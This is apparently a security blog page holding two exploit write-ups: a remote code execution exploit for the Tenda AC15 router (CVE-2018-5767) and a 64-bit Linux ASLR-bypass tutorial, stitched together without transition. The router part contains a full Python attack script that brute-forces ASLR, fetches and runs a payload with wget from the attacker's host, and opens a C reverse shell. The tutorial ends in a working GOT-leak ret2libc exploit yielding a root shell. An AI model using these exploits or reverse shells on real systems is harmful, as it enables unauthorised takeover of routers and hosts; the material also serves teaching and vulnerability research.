REMOTE CODE EXECUTION ROP,NX,ASLR (CVE-2018-5767) Tenda’s AC15 router

INTRODUCTION (CVE-2018-5767)

In this post we will be presenting a pre-authenticated remote code execution vulnerability present in Tenda’s AC15 router. We start by analysing the vulnerability, before moving on to our regular pattern of exploit development – identifying problems and then fixing those in turn to develop a working exploit.

N.B – Numerous attempts were made to contact the vendor with no success. Due to the nature of the vulnerability, offset’s have been redacted from the post to prevent point and click exploitation.

LAYING THE GROUNDWORK

The vulnerability in question is caused by a buffer overflow due to unsanitised user input being passed directly to a call to sscanf. The figure below shows the vulnerable code in the R7WebsSecurityHandler function of the HTTPD binary for the device.

Note that the “password=” parameter is part of the Cookie header. We see that the code uses strstr to find this field, and then copies everything after the equals size (excluding a ‘;’ character – important for later) into a fixed size stack buffer.

If we send a large enough password value we can crash the server, in the following picture we have attached to the process using a cross compiled Gdbserver binary, we can access the device using telnet (a story for another post).

This crash isn’t exactly ideal. We can see that it’s due to an invalid read attempting to load a byte from R3 which points to 0x41414141. From our analysis this was identified as occurring in a shared library and instead of looking for ways to exploit it, we turned our focus back on the vulnerable function to try and determine what was happening after the overflow.

In the next figure we see the issue; if the string copied into the buffer contains “.gif”, then the function returns immediately without further processing. The code isn’t looking for “.gif” in the password, but in the user controlled buffer for the whole request. Avoiding further processing of a overflown buffer and returning immediately is exactly what we want (loc_2f7ac simply jumps to the function epilogue).

Appending “.gif” to the end of a long password string of “A”‘s gives us a segfault with PC=0x41414141. With the ability to reliably control the flow of execution we can now outline the problems we must address, and therefore begin to solve them – and so at the same time, develop a working exploit.

To begin with, the following information is available about the binary:

file httpd
format elf
type EXEC (Executable file)
arch arm
bintype elf
bits 32
canary false
endian little
intrp /lib/ld-uClibc.so.0
machine ARM
nx true
pic false
relocs false
relro no
static false

I’ve only included the most important details – mainly, the binary is a 32bit ARMEL executable, dynamically linked with NX being the only exploit mitigation enabled (note that the system has randomize_va_space = 1, which we’ll have to deal with). Therefore, we have the following problems to address:

  1. Gain reliable control of PC through offset of controllable buffer.
  2. Bypass No Execute (NX, the stack is not executable).
  3. Bypass Address space layout randomisation (randomize_va_space = 1).
  4. Chain it all together into a full exploit.

PROBLEM SOLVING 101

The first problem to solve is a general one when it comes to exploiting memory corruption vulnerabilities such as this –  identifying the offset within the buffer at which we can control certain registers. We solve this problem using Metasploit’s pattern create and pattern offset scripts. We identify the correct offset and show reliable control of the PC register:

With problem 1 solved, our next task involves bypassing No Execute. No Execute (NX or DEP) simply prevents us from executing shellcode on the stack. It ensures that there are no writeable and executable pages of memory. NX has been around for a while so we won’t go into great detail about how it works or its bypasses, all we need is some ROP magic.

We make use of the “Return to Zero Protection” (ret2zp) method [1]. The problem with building a ROP chain for the ARM architecture is down to the fact that function arguments are passed through the R0-R3 registers, as opposed to the stack for Intel x86. To bypass NX on an x86 processor we would simply carry out a ret2libc attack, whereby we store the address of libc’s system function at the correct offset, and then a null terminated string at offset+4 for the command we wish to run:

To perform a similar attack on our current target, we need to pass the address of our command through R0, and then need some way of jumping to the system function. The sort of gadget we need for this is a mov instruction whereby the stack pointer is moved into R0. This gives us the following layout:

We identify such a gadget in the libc shared library, however, the gadget performs the following instructions.

mov sp, r0
blx r3

This means that before jumping to this gadget, we must have the address of system in R3. To solve this problem, we simply locate a gadget that allows us to mov or pop values from the stack into R3, and we identify such a gadget again in the libc library:

pop {r3,r4,r7,pc}

This gadget has the added benefit of jumping to SP+12, our buffer should therefore look as such:

Note the ‘;.gif’ string at the end of the buffer, recall that the call to sscanf stops at a ‘;’ character, whilst the ‘.gif’ string will allow us to cleanly exit the function. With the following Python code, we have essentially bypassed NX with two gadgets:

libc_base = ****
curr_libc = libc_base + (0x7c << 12)
system = struct.pack(«<I», curr_libc + ****)
#: pop {r3, r4, r7, pc}
pop = struct.pack(«<I», curr_libc + ****)
#: mov r0, sp ; blx r3
mv_r0_sp = struct.pack(«<I», curr_libc + ****)
password = «A»*offset
password += pop + system + «B»*8 + mv_r0_sp + command + «.gif»

With problem 2 solved, we now move onto our third problem; bypassing ASLR. Address space layout randomisation can be very difficult to bypass when we are attacking network based applications, this is generally due to the fact that we need some form of information leak. Although it is not enabled on the binary itself, the shared library addresses all load at different addresses on each execution. One method to generate an information leak would be to use “native” gadgets present in the HTTPD binary (which does not have ASLR) and ROP into the leak. The problem here however is that each gadget contains a null byte, and so we can only use 1. If we look at how random the randomisation really is, we see that actually the library addresses (specifically libc which contains our gadgets) only differ by one byte on each execution. For example, on one run libc’s base may be located at 0xXXXXXXXX, and on the next run it is at 0xXXXXXXXX

. We could theoretically guess this value, and we would have a small chance of guessing correct.

This is where our faithful watchdog process comes in. One process running on this device is responsible for restarting services that have crashed, so every time the HTTPD process segfaults, it is immediately restarted, pretty handy for us. This is enough for us to do some naïve brute forcing, using the following process:

With NX and ASLR successfully bypassed, we now need to put this all together (problem 3). This however, provides us with another set of problems to solve:

  1. How do we detect the exploit has been successful?
  2. How do we use this exploit to run arbitrary code on the device?

We start by solving problem 2, which in turn will help us solve problem 1. There are a few steps involved with running arbitrary code on the device. Firstly, we can make use of tools on the device to download arbitrary scripts or binaries, for example, the following command string will download a file from a remote server over HTTP, change its permissions to executable and then run it:

command = «wget http://192.168.0.104/malware -O /tmp/malware && chmod 777 /tmp/malware && /tmp/malware &;»

The “malware” binary should give some indication that the device has been exploited remotely, to achieve this, we write a simple TCP connect back program. This program will create a connection back to our attacking system, and duplicate the stdin and stdout file descriptors – it’s just a simple reverse shell.

#include <sys/socket.h>

#include <sys/types.h>

#include <string.h>

#include <stdio.h>

#include <netinet/in.h>

int main(int argc, char **argv)

{

struct sockaddr_in addr;

socklen_t addrlen;

int sock = socket(AF_INET, SOCK_STREAM, 0);

memset(&addr, 0x00, sizeof(addr));

addr.sin_family = AF_INET;

addr.sin_port = htons(31337);

addr.sin_addr.s_addr = inet_addr(“192.168.0.104”);

int conn = connect(sock, (struct sockaddr *)&addr,sizeof(addr));

dup2(sock, 0);

dup2(sock, 1);

dup2(sock, 2);

system(“/bin/sh”);

}

We need to cross compile this code into an ARM binary, to do this, we use a prebuilt toolchain downloaded from Uclibc. We also want to automate the entire process of this exploit, as such, we use the following code to handle compiling the malicious code (with a dynamically configurable IP address). We then use a subprocess to compile the code (with the user defined port and IP), and serve it over HTTP using Python’s SimpleHTTPServer module.

”’

* Take the ARM_REV_SHELL code and modify it with

* the given ip and port to connect back to.

* This function then compiles the code into an

* ARM binary.

@Param comp_path – This should be the path of the cross-compiler.

@Param my_ip – The IP address of the system running this code.

”’

def compile_shell(comp_path, my_ip):

global ARM_REV_SHELL

outfile = open(“a.c”, “w”)

 

ARM_REV_SHELL = ARM_REV_SHELL%(REV_PORT, my_ip)

 

#write the code with ip and port to a.c

outfile.write(ARM_REV_SHELL)

outfile.close()

 

compile_cmd = [comp_path, “a.c”,”-o”, “a”]

 

s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

 

#wait for the process to terminate so we can get its return code

while s.poll() == None:

continue

 

if s.returncode == 0:

return True

else:

print “[x] Error compiling code, check compiler? Read the README?”

return False

 

”’

* This function uses the SimpleHTTPServer module to create

* a http server that will serve our malicious binary.

* This function is called as a thread, as a daemon process.

”’

def start_http_server():

Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

httpd = SocketServer.TCPServer((“”, HTTPD_PORT), Handler)

 

print “[+] Http server started on port %d” %HTTPD_PORT

httpd.serve_forever()

This code will allow us to utilise the wget tool present on the device to fetch our binary and run it, this in turn will allow us to solve problem 1. We can identify if the exploit has been successful by waiting for connections back. The abstract diagram in the next figure shows how we can make use of a few threads with a global flag to solve problem 1 given the solution to problem 2.

The functions shown in the following code take care of these processes:

”’

* This function creates a listening socket on port

* REV_PORT. When a connection is accepted it updates

* the global DONE flag to indicate successful exploitation.

* It then jumps into a loop whereby the user can send remote

* commands to the device, interacting with a spawned /bin/sh

* process.

”’

def threaded_listener():

global DONE

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)

 

host = (“0.0.0.0”, REV_PORT)

 

try:

s.bind(host)

except:

print “[+] Error binding to %d” %REV_PORT

return -1

 

print “[+] Connect back listener running on port %d” %REV_PORT

 

s.listen(1)

conn, host = s.accept()

 

#We got a connection, lets make the exploit thread aware

DONE = True

 

print “[+] Got connect back from %s” %host[0]

print “[+] Entering command loop, enter exit to quit”

 

#Loop continuosly, simple reverse shell interface.

while True:

print “#”,

cmd = raw_input()

if cmd == “exit”:

break

if cmd == ”:

continue

 

conn.send(cmd + “\n”)

 

print conn.recv(4096)

 

”’

* This function presents the actual vulnerability exploited.

* The Cookie header has a password field that is vulnerable to

* a sscanf buffer overflow, we make use of 2 ROP gadgets to

* bypass DEP/NX, and can brute force ASLR due to a watchdog

* process restarting any processes that crash.

* This function will continually make malicious requests to the

* devices web interface until the DONE flag is set to True.

@Param host – the ip address of the target.

@Param port – the port the webserver is running on.

@Param my_ip – The ip address of the attacking system.

”’

def exploit(host, port, my_ip):

global DONE

url = “http://%s:%s/goform/exeCommand”%(host, port)

i = 0

 

command = “wget http://%s:%s/a -O /tmp/a && chmod 777

/tmp/a && /tmp/./a &;” %(my_ip, HTTPD_PORT)

 

#Guess the same libc base address each time

libc_base = ****

curr_libc = libc_base + (0x7c << 12)

 

system = struct.pack(“<I”, curr_libc + ****)

 

#: pop {r3, r4, r7, pc}

pop = struct.pack(“<I”, curr_libc + ****)

#: mov r0, sp ; blx r3

mv_r0_sp = struct.pack(“<I”, curr_libc + ****)

 

password = “A”*offset

password += pop + system + “B”*8 + mv_r0_sp + command + “.gif”

 

print “[+] Beginning brute force.”

while not DONE:

i += 1

print “[+] Attempt %d”%i

 

#build the request, with the malicious password field

req = urllib2.Request(url)

req.add_header(“Cookie”, “password=%s”%password)

 

#The request will throw an exception when we crash the server,

#we don’t care about this, so don’t handle it.

try:

resp = urllib2.urlopen(req)

except:

pass

 

#Give the device some time to restart the process.

time.sleep(1)

 

print “[+] Exploit done”

Finally, we put all of this together by spawning the individual threads, as well as getting command line options as usual:

def main():

parser = OptionParser()

parser.add_option(“-t”, “–target”, dest=”host_ip”,

help=”IP address of the target”)

parser.add_option(“-p”, “–port”, dest=”host_port”,

help=”Port of the targets webserver”)

parser.add_option(“-c”, “–comp-path”, dest=”compiler_path”,

help=”path to arm cross compiler”)

parser.add_option(“-m”, “–my-ip”, dest=”my_ip”, help=”your  ip address”)

 

options, args = parser.parse_args()

 

host_ip = options.host_ip

host_port = options.host_port

comp_path = options.compiler_path

my_ip = options.my_ip

 

if host_ip == None or host_port == None:

parser.error(“[x] A target ip address (-t) and port (-p) are required”)

 

if comp_path == None:

parser.error(“[x] No compiler path specified,

you need a uclibc arm cross compiler,

such as https://www.uclibc.org/downloads/

binaries/0.9.30/cross-compiler-arm4l.tar.bz2″)

 

if my_ip == None:

parser.error(“[x] Please pass your ip address (-m)”)

 

 

if not compile_shell(comp_path, my_ip):

print “[x] Exiting due to error in compiling shell”

return -1

 

httpd_thread = threading.Thread(target=start_http_server)

httpd_thread.daemon = True

httpd_thread.start()

 

conn_listener = threading.Thread(target=threaded_listener)

conn_listener.start()

 

#Give the thread a little time to start up, and fail if that happens

time.sleep(3)

 

if not conn_listener.is_alive():

print “[x] Exiting due to conn_listener error”

return -1

 

 

exploit(host_ip, host_port, my_ip)

 

 

conn_listener.join()

 

return 0

 

 

 

if __name__ == ‘__main__’:

main()

With all of this together, we run the code and after a few minutes get our reverse shell as root:

The full code is here:

#!/usr/bin/env python

import urllib2

import struct

import time

import socket

from optparse import *

import SimpleHTTPServer

import SocketServer

import threading

import sys

import os

import subprocess

 

ARM_REV_SHELL = (

“#include <sys/socket.h>\n”

“#include <sys/types.h>\n”

“#include <string.h>\n”

“#include <stdio.h>\n”

“#include <netinet/in.h>\n”

“int main(int argc, char **argv)\n”

“{\n”

”           struct sockaddr_in addr;\n”

”           socklen_t addrlen;\n”

”           int sock = socket(AF_INET, SOCK_STREAM, 0);\n”

 

”           memset(&addr, 0x00, sizeof(addr));\n”

 

”           addr.sin_family = AF_INET;\n”

”           addr.sin_port = htons(%d);\n”

”           addr.sin_addr.s_addr = inet_addr(\”%s\”);\n”

 

”           int conn = connect(sock, (struct sockaddr *)&addr,sizeof(addr));\n”

 

”           dup2(sock, 0);\n”

”           dup2(sock, 1);\n”

”           dup2(sock, 2);\n”

 

”           system(\”/bin/sh\”);\n”

“}\n”

)

 

REV_PORT = 31337

HTTPD_PORT = 8888

DONE = False

 

”’

* This function creates a listening socket on port

* REV_PORT. When a connection is accepted it updates

* the global DONE flag to indicate successful exploitation.

* It then jumps into a loop whereby the user can send remote

* commands to the device, interacting with a spawned /bin/sh

* process.

”’

def threaded_listener():

global DONE

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)

 

host = (“0.0.0.0”, REV_PORT)

 

try:

s.bind(host)

except:

print “[+] Error binding to %d” %REV_PORT

return -1

 

 

print “[+] Connect back listener running on port %d” %REV_PORT

 

s.listen(1)

conn, host = s.accept()

 

#We got a connection, lets make the exploit thread aware

DONE = True

 

print “[+] Got connect back from %s” %host[0]

print “[+] Entering command loop, enter exit to quit”

 

#Loop continuosly, simple reverse shell interface.

while True:

print “#”,

cmd = raw_input()

if cmd == “exit”:

break

if cmd == ”:

continue

 

conn.send(cmd + “\n”)

 

print conn.recv(4096)

 

”’

* Take the ARM_REV_SHELL code and modify it with

* the given ip and port to connect back to.

* This function then compiles the code into an

* ARM binary.

@Param comp_path – This should be the path of the cross-compiler.

@Param my_ip – The IP address of the system running this code.

”’

def compile_shell(comp_path, my_ip):

global ARM_REV_SHELL

outfile = open(“a.c”, “w”)

 

ARM_REV_SHELL = ARM_REV_SHELL%(REV_PORT, my_ip)

 

outfile.write(ARM_REV_SHELL)

outfile.close()

 

compile_cmd = [comp_path, “a.c”,”-o”, “a”]

 

s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

 

while s.poll() == None:

continue

 

if s.returncode == 0:

return True

else:

print “[x] Error compiling code, check compiler? Read the README?”

return False

 

”’

* This function uses the SimpleHTTPServer module to create

* a http server that will serve our malicious binary.

* This function is called as a thread, as a daemon process.

”’

def start_http_server():

Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

httpd = SocketServer.TCPServer((“”, HTTPD_PORT), Handler)

 

print “[+] Http server started on port %d” %HTTPD_PORT

httpd.serve_forever()

 

 

”’

* This function presents the actual vulnerability exploited.

* The Cookie header has a password field that is vulnerable to

* a sscanf buffer overflow, we make use of 2 ROP gadgets to

* bypass DEP/NX, and can brute force ASLR due to a watchdog

* process restarting any processes that crash.

* This function will continually make malicious requests to the

* devices web interface until the DONE flag is set to True.

@Param host – the ip address of the target.

@Param port – the port the webserver is running on.

@Param my_ip – The ip address of the attacking system.

”’

def exploit(host, port, my_ip):

global DONE

url = “http://%s:%s/goform/exeCommand”%(host, port)

i = 0

 

command = “wget http://%s:%s/a -O /tmp/a && chmod 777 /tmp/a && /tmp/./a &;” %(my_ip, HTTPD_PORT)

 

#Guess the same libc base continuosly

libc_base = ****

curr_libc = libc_base + (0x7c << 12)

 

system = struct.pack(“<I”, curr_libc + ****)

 

#: pop {r3, r4, r7, pc}

pop = struct.pack(“<I”, curr_libc + ****)

#: mov r0, sp ; blx r3

mv_r0_sp = struct.pack(“<I”, curr_libc + ****)

 

password = “A”*offset

password += pop + system + “B”*8 + mv_r0_sp + command + “.gif”

 

print “[+] Beginning brute force.”

while not DONE:

i += 1

print “[+] Attempt %d” %i

 

#build the request, with the malicious password field

req = urllib2.Request(url)

req.add_header(“Cookie”, “password=%s”%password)

 

#The request will throw an exception when we crash the server,

#we don’t care about this, so don’t handle it.

try:

resp = urllib2.urlopen(req)

except:

pass

 

#Give the device some time to restart the

time.sleep(1)

 

print “[+] Exploit done”

 

 

def main():

parser = OptionParser()

parser.add_option(“-t”, “–target”, dest=”host_ip”, help=”IP address of the target”)

parser.add_option(“-p”, “–port”, dest=”host_port”, help=”Port of the targets webserver”)

parser.add_option(“-c”, “–comp-path”, dest=”compiler_path”, help=”path to arm cross compiler”)

parser.add_option(“-m”, “–my-ip”, dest=”my_ip”, help=”your ip address”)

 

options, args = parser.parse_args()

 

host_ip = options.host_ip

host_port = options.host_port

comp_path = options.compiler_path

my_ip = options.my_ip

 

if host_ip == None or host_port == None:

parser.error(“[x] A target ip address (-t) and port (-p) are required”)

 

if comp_path == None:

parser.error(“[x] No compiler path specified, you need a uclibc arm cross compiler, such as https://www.uclibc.org/downloads/binaries/0.9.30/cross-compiler-arm4l.tar.bz2”)

 

if my_ip == None:

parser.error(“[x] Please pass your ip address (-m)”)

 

 

if not compile_shell(comp_path, my_ip):

print “[x] Exiting due to error in compiling shell”

return -1

 

httpd_thread = threading.Thread(target=start_http_server)

httpd_thread.daemon = True

httpd_thread.start()

 

conn_listener = threading.Thread(target=threaded_listener)

conn_listener.start()

 

#Give the thread a little time to start up, and fail if that happens

time.sleep(3)

 

if not conn_listener.is_alive():

print “[x] Exiting due to conn_listener error”

return -1

 

 

exploit(host_ip, host_port, my_ip)

 

 

conn_listener.join()

 

return 0

 

 

 

if __name__ == ‘__main__’:

main()

64-bit Linux stack smashing tutorial: Part 3

t’s been almost a year since I posted part 2, and since then, I’ve received requests to write a follow up on how to bypass ASLR. There are quite a few ways to do this, and rather than go over all of them, I’ve picked one interesting technique that I’ll describe here. It involves leaking a library function’s address from the GOT, and using it to determine the addresses of other functions in libc that we can return to.

Setup

The setup is identical to what I was using in part 1 and part 2. No new tools required.

Leaking a libc address

Here’s the source code for the binary we’ll be exploiting:

/* Compile: gcc -fno-stack-protector leak.c -o leak          */
/* Enable ASLR: echo 2 > /proc/sys/kernel/randomize_va_space */

#include <stdio.h>
#include <string.h>
#include <unistd.h>

void helper() {
    asm("pop %rdi; pop %rsi; pop %rdx; ret");
}

int vuln() {
    char buf[150];
    ssize_t b;
    memset(buf, 0, 150);
    printf("Enter input: ");
    b = read(0, buf, 400);

    printf("Recv: ");
    write(1, buf, b);
    return 0;
}

int main(int argc, char *argv[]){
    setbuf(stdout, 0);
    vuln();
    return 0;
}

You can compile it yourself, or download the precompiled binary here.

The vulnerability is in the vuln() function, where read() is allowed to write 400 bytes into a 150 byte buffer. With ASLR on, we can’t just return to system() as its address will be different each time the program runs. The high level solution to exploiting this is as follows:

  1. Leak the address of a library function in the GOT. In this case, we’ll leak memset()’s GOT entry, which will give us memset()’s address.
  2. Get libc’s base address so we can calculate the address of other library functions. libc’s base address is the difference between memset()’s address, and memset()’s offset from libc.so.6.
  3. A library function’s address can be obtained by adding its offset from libc.so.6 to libc’s base address. In this case, we’ll get system()’s address.
  4. Overwrite a GOT entry’s address with system()’s address, so that when we call that function, it calls system() instead.

You should have a bit of an understanding on how shared libraries work in Linux. In a nutshell, the loader will initially point the GOT entry for a library function to some code that will do a slow lookup of the function address. Once it finds it, it overwrites its GOT entry with the address of the library function so it doesn’t need to do the lookup again. That means the second time a library function is called, the GOT entry will point to that function’s address. That’s what we want to leak. For a deeper understanding of how this all works, I refer you to PLT and GOT — the key to code sharing and dynamic libraries.

Let’s try to leak memset()’s address. We’ll run the binary under socat so we can communicate with it over port 2323:

# socat TCP-LISTEN:2323,reuseaddr,fork EXEC:./leak

Grab memset()’s entry in the GOT:

# objdump -R leak | grep memset
0000000000601030 R_X86_64_JUMP_SLOT  memset

Let’s set a breakpoint at the call to memset() in vuln(). If we disassemble vuln(), we see that the call happens at 0x4006c6. So add a breakpoint in ~/.gdbinit:

# echo "br *0x4006c6" >> ~/.gdbinit

Now let’s attach gdb to socat.

# gdb -q -p `pidof socat`
Breakpoint 1 at 0x4006c6
Attaching to process 10059
.
.
.
gdb-peda$ c
Continuing.

Hit “c” to continue execution. At this point, it’s waiting for us to connect, so we’ll fire up nc and connect to localhost on port 2323:

# nc localhost 2323

Now check gdb, and it will have hit the breakpoint, right before memset() is called.

   0x4006c3 <vuln+28>:  mov    rdi,rax
=> 0x4006c6 <vuln+31>:  call   0x400570 <memset@plt>
   0x4006cb <vuln+36>:  mov    edi,0x4007e4

Since this is the first time memset() is being called, we expect that its GOT entry points to the slow lookup function.

gdb-peda$ x/gx 0x601030
0x601030 <memset@got.plt>:      0x0000000000400576
gdb-peda$ x/5i 0x0000000000400576
   0x400576 <memset@plt+6>:     push   0x3
   0x40057b <memset@plt+11>:    jmp    0x400530
   0x400580 <read@plt>: jmp    QWORD PTR [rip+0x200ab2]        # 0x601038 <read@got.plt>
   0x400586 <read@plt+6>:       push   0x4
   0x40058b <read@plt+11>:      jmp    0x400530

Step over the call to memset() so that it executes, and examine its GOT entry again. This time it points to memset()’s address:

gdb-peda$ x/gx 0x601030
0x601030 <memset@got.plt>:      0x00007f86f37335c0
gdb-peda$ x/5i 0x00007f86f37335c0
   0x7f86f37335c0 <memset>:     movd   xmm8,esi
   0x7f86f37335c5 <memset+5>:   mov    rax,rdi
   0x7f86f37335c8 <memset+8>:   punpcklbw xmm8,xmm8
   0x7f86f37335cd <memset+13>:  punpcklwd xmm8,xmm8
   0x7f86f37335d2 <memset+18>:  pshufd xmm8,xmm8,0x0

If we can write memset()’s GOT entry back to us, we’ll receive it’s address of 0x00007f86f37335c0. We can do that by overwriting vuln()’s saved return pointer to setup a ret2plt; in this case, write@plt. Since we’re exploiting a 64-bit binary, we need to populate the RDI, RSI, and RDX registers with the arguments for write(). So we need to return to a ROP gadget that sets up these registers, and then we can return to write@plt.

I’ve created a helper function in the binary that contains a gadget that will pop three values off the stack into RDI, RSI, and RDX. If we disassemble helper(), we’ll see that the gadget starts at 0x4006a1. Here’s the start of our exploit:

#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address 
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

# keep socket open so gdb doesn't get a SIGTERM
while True: 
    s.recv(1024)

Let’s see it in action:

# ./poc.py
Enter input:
Recv:
memset() is at 0x7f679978e5c0

I recommend attaching gdb to socat as before and running poc.py. Step through the instructions so you can see what’s going on. After memset() is called, do a “p memset”, and compare that address with the leaked address you receive. If it’s identical, then you’ve successfully leaked memset()’s address.

Next we need to calculate libc’s base address in order to get the address of any library function, or even a gadget, in libc. First, we need to get memset()’s offset from libc.so.6. On my machine, libc.so.6 is at /lib/x86_64-linux-gnu/libc.so.6. You can find yours by using ldd:

# ldd leak
        linux-vdso.so.1 =>  (0x00007ffd5affe000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ff25c07d000)
        /lib64/ld-linux-x86-64.so.2 (0x00005630d0961000)

libc.so.6 contains the offsets of all the functions available to us in libc. To get memset()’s offset, we can use readelf:

# readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep memset
    66: 00000000000a1de0   117 FUNC    GLOBAL DEFAULT   12 wmemset@@GLIBC_2.2.5
   771: 000000000010c150    16 FUNC    GLOBAL DEFAULT   12 __wmemset_chk@@GLIBC_2.4
   838: 000000000008c5c0   247 FUNC    GLOBAL DEFAULT   12 memset@@GLIBC_2.2.5
  1383: 000000000008c5b0     9 FUNC    GLOBAL DEFAULT   12 __memset_chk@@GLIBC_2.3.4

memset()’s offset is at 0x8c5c0. Subtracting this from the leaked memset()’s address will give us libc’s base address.

To find the address of any library function, we just do the reverse and add the function’s offset to libc’s base address. So to find system()’s address, we get its offset from libc.so.6, and add it to libc’s base address.

Here’s our modified exploit that leaks memset()’s address, calculates libc’s base address, and finds the address of system():

# ./poc.py
#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

libc_base = memset_addr[0] - memset_off
print "libc base is", hex(libc_base)

system_addr = libc_base + system_off
print "system() is at", hex(system_addr)

# keep socket open so gdb doesn't get a SIGTERM
while True:
    s.recv(1024)

And here it is in action:

# ./poc.py
Enter input:
Recv:
memset() is at 0x7f9d206e45c0
libc base is 0x7f9d20658000
system() is at 0x7f9d2069e640

Now that we can get any library function address, we can do a ret2libc to complete the exploit. We’ll overwrite memset()’s GOT entry with the address of system(), so that when we trigger a call to memset(), it will call system(“/bin/sh”) instead. Here’s what we need to do:

  1. Overwrite memset()’s GOT entry with the address of system() using read@plt.
  2. Write “/bin/sh” somewhere in memory using read@plt. We’ll use 0x601000 since it’s a writable location with a static address.
  3. Set RDI to the location of “/bin/sh” and return to system().

Here’s the final exploit:

#!/usr/bin/env python

import telnetlib
from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
read_plt   = 0x400580            # address of read@plt
memset_plt = 0x400570            # address of memset@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret
writeable  = 0x601000            # location to write "/bin/sh" to

# leak memset()'s libc address using write@plt
buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

# payload for stage 1: overwrite memset()'s GOT entry using read@plt
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # stdin
buf += pack("<Q", memset_got)   # address to write to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin
buf += pack("<Q", read_plt)     # return to read@plt

# payload for stage 2: read "/bin/sh" into 0x601000 using read@plt
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # junk
buf += pack("<Q", writeable)    # location to write "/bin/sh" to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin
buf += pack("<Q", read_plt)     # return to read@plt

# payload for stage 3: set RDI to location of "/bin/sh", and call system()
buf += pack("<Q", pop3ret)      # pop rdi; ret
buf += pack("<Q", writeable)    # address of "/bin/sh"
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", memset_plt)   # return to memset@plt which is actually system() now

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

# stage 1: overwrite RIP so we return to write@plt to leak memset()'s libc address
print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address 
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

libc_base = memset_addr[0] - memset_off
print "libc base is", hex(libc_base)

system_addr = libc_base + system_off
print "system() is at", hex(system_addr)

# stage 2: send address of system() to overwrite memset()'s GOT entry
print "sending system()'s address", hex(system_addr)
s.send(pack("<Q", system_addr))

# stage 3: send "/bin/sh" to writable location
print "sending '/bin/sh'"
s.send("/bin/sh")

# get a shell
t = telnetlib.Telnet()
t.sock = s
t.interact()

I’ve commented the code heavily, so hopefully that will explain what’s going on. If you’re still a bit confused, attach gdb to socat and step through the process. For good measure, let’s run the binary as the root user, and run the exploit as a non-priviledged user:

koji@pwnbox:/root/work$ whoami
koji
koji@pwnbox:/root/work$ ./poc.py
Enter input:
Recv:
memset() is at 0x7f57f50015c0
libc base is 0x7f57f4f75000
system() is at 0x7f57f4fbb640
+ sending system()'s address 0x7f57f4fbb640
+ sending '/bin/sh'
whoami
root

Got a root shell and we bypassed ASLR, and NX!

We’ve looked at one way to bypass ASLR by leaking an address in the GOT. There are other ways to do it, and I refer you to the ASLR Smack & Laugh Reference for some interesting reading. Before I end off, you may have noticed that you need to have the correct version of libc to subtract an offset from the leaked address in order to get libc’s base address. If you don’t have access to the target’s version of libc, you can attempt to identify it using libc-database. Just pass it the leaked address and hopefully, it will identify the libc version on the target, which will allow you to get the correct offset of a function.

64-bit Linux stack smashing tutorial: Part 2

